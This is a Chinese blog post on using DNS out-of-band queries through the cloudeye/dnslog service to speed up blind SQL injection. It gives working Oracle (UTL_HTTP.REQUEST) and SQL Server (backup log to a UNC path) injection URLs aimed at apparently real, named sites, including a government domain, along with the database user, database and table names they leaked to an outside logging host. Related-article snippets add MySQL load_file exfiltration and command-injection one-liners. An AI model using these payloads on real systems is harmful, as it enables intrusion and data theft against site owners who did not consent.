dns带外查询(cloudeye.me的使用)

最新推荐文章于 2024-05-14 14:24:19 发布
最新推荐文章于 2024-05-14 14:24:19 发布
阅读量1w 收藏 5
点赞数
分类专栏: 安全 文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/50001367
版权
一些操蛋盲注可以用dns的带外查询来解决了,而且有了cloudeye这个神器就可以愉快的解决:

说明:
我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息带出来

比如:ping test.xxxxx.dnslog.info

你就会看到在日志记录上留下痕迹:
test.xxxxx.dnslog.info


我们如果用数据库发起一个dns请求: (数据库查询结果).xxxx.dnslog.info

就会在cloudeye的日志里面留下
(数据库查询结果).xxxx.dnslog.info

注意:
dns的请求被限制在63个字符长度大小
oracle的利用方式:
(1)首先是获取数据库的当前用户的用户名:

http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)||'.xxxxx.dnslog.info') FROM DUAL) –

说明:我看了帖子终于找到一个靠谱的函数:
UTL_HTTP.REQUEST():
utl_http包功能还是很强大的 可以通过他来捕捉网站页面的内容 或者调用一个url的接口完成某项功能

这里我们来用他引发dns 查询

在cloudeye的日志中留下的:nchd.xxxxx.dnslog.info

其中:nchd 就是数据库的当前用户名

(2)查询表名:
http://210.35.35.70:82/Book.aspx?id=0199332841' union (SELECT UTL_HTTP.REQUEST((SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)||'.xxxxx.dnslog.info') FROM DUAL) –

结果:

dr$qk_comcp_fulltext$k.xxxxx.dnslog.info

表名是:dr$qk_comcp_fulltext$k

sql server的利用方式:

获取数据库名:

www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select db_name());exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxxx.dnslog.info\a'';');--


结果:

kaifeng.xxxxx.dnslog.info

数据库名字:kaifeng

爆表:
www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1;declare @@yukari varchar(100);set @@yukari=(select top 1 name from kaifeng.sys.all_objects where type='U' AND is_ms_shipped=0);exec('backup log kaifeng to disk=''\\'+@@yukari+'.xxxxx.dnslog.info\a'';');--

结果:

FRIENDLINK.xxxxx.dnslog.info

表名:FRIENDLINK

对了,cloudeye可以在乌云官网上购买:

http://www.wooyun.org/market/260

10wb
niexinming
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap + dnslog外带数据:
CYLK1987310466的博客
08-06 1008
sqlmap dnslog外带数据
DNS域名解析服务
weixin_51099370的博客
04-14 1719
文章目录前言一、BIND域名服务基础1、DNS概念DNS使用的协议及端口号常用域名后缀2、DNS系统的作用及类型3、正向解析查询过程查询方式递归查询迭代查询二、DNS系统类型1、构建缓存域名服务器缓存域名服务器2、构建主从域名服务器2.1主域名服务器2.2从域名服务器三、BIND的安装和配置文件1、主配置文件named.conf 2-1全局配置部分2、BIND软件安装BIND (Berkeley Internet Name Daemon)相关软件包3、BIND服务BIND服务器端程序总结 前言 我们访问网
2024年网络安全最新插件分享 来检测带外(Out-of-Band)流量的Ceye_ceye api,2024年最新再不了解你就out啦
2401_84519929的博客
05-12 366
本插件由于返回的数据量较小使用的就是第二种方法。2.在开发初期,由于没有使用最新版本的 Goby 进行开发,导致有部分高版本才拥有的 API 没有办法使用,比如 Goby.getLang() 这个在国际化过程中需要用到的 API. 所以推荐在最新版的 Goby 上进行插件开发。总体上插件的使用是十分简单的,在 Goby 的设置 → 插件设置 → CEYE Dnslog Platform 页面,填写你再登录 Ceye.io 后获取到的 APIkey 以及分配的域名并点击确定,如图。
DNS外带】
==
03-01 784
DNS_LOG外带 DNSLOG.cn (实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带) 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
DNSlog注入 信息的 带外|外带 sql注入利用详解+实操
weixin_48083470的博客
08-04 3559
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns带外查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns带外查询属于MySQL注入,在MySQL中有个系统属性 s
ICMP带外查询Dnslog
AlunXZhou的博客
03-28 464
ping -c 1 /127.0.0.1 || whoami(前为假,输出后命令,否则不输出后命令)ping -c 1 127.0.0.1 && whoami(前命令必须为真,否则后命令不输出)管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)ping -c 1 127.0.0.1;ping -c 127.0.0.1 `whoami` (反引号为报错输出)ping -c 1 127.0.0.1 | whoami(只输出后命令)| || & && ``(特有``和;
com.tcloudit.cloudeye_3.0.17_268.apk
03-18
com.tcloudit.cloudeye_3.0.17_268.apk
cloudeye-exporter
05-26
(选项)在干净的Ubuntu 16.04上使用精确步骤构建发现 $ wget https://dl.google.com/go/go1.12.5.linux-amd64.tar.gz $ sudo tar -C /usr/local -xzf go1.12.5.linux-amd64.tar.gz $ export PATH=$PATH:/usr/local...
一个有趣的东西-cloudeye1
08-03
总的来说,CloudEye通过DNS带外查询提供了一种有效且高效的方式来探测和利用命令执行漏洞以及处理时间盲注问题。这种技术不仅适用于有回显的注入场景,还能在无回显的情况下收集信息,大大增强了渗透测试和漏洞发现...
cloudeye:您的云上有几个分布式云眼,可帮助您了解有关网站服务的所有信息
05-10
cloudeye使用influxdb(版本> = 0.9)作为mertic存储,并使用grafana显示指标 为什么这样做 我们需要一个简单的工具来监视和分析我们的日志,logstash + statsd + influxdb + grafana似乎是一个完美的解决方案,但是...
建筑类软件公司目录.docx
05-27
26. 浪潮集团的浪潮ERP和云眼Cloudeye,为工程管理提供智能化信息平台。 27. 江苏鼎思科技发展有限公司的建造师软件,以绩效为导向进行工程管理。 28. 北京联合众位科技发展有限公司的智慧工地解决方案,涵盖了...
dnslog外带是什么
最新发布
来而不往非礼也
05-14 1025
在看hw面经的时候发现dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
sql注入——dns带外注入
cxrpty的博客
02-10 3594
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
记一次紧急安全事件:请求带外攻击(OOB)域名
可乐要加冰!!!
09-01 1058
记一次紧急安全事件:请求带外攻击(OOB)域名
cloudeye的实现
12-15 501
难点在于DNS server的搭建,然而非常简单,安装dnslib就有DNS server:zoneresolver.py,稍作修改即可使用 # -*- coding: utf-8 -*- from __future__ import print_function import os os.environ.setdefault("DJANGO_SETTINGS_...
网站域名DNS劫持了怎么办?dns被劫持了怎么处理
seven9711的博客
12-24 1900
域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址,其效果就是对特定的网址不能访问或访问的是假网址。 域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址。 域名劫持一方面可能影响用户的正常体验,用户被引到假冒的网站进而无法正常浏览网页。用户量较大的网站域名被劫持后恶劣影响会不断扩大,
写bat脚本双击执行
qq_35911118的博客
04-08 2722
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
H13-811-HCIA-Cloud Service.pdf
11-17
在给出的选项中,云监控服务CloudEye属于SaaS,因为它提供了监控和管理云资源的服务。 2. 华为公有云生态:华为公有云生态包括华为云学院、合作伙伴、华为云市场和开发者中心,这些都为用户提供了一个全面的云服务...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值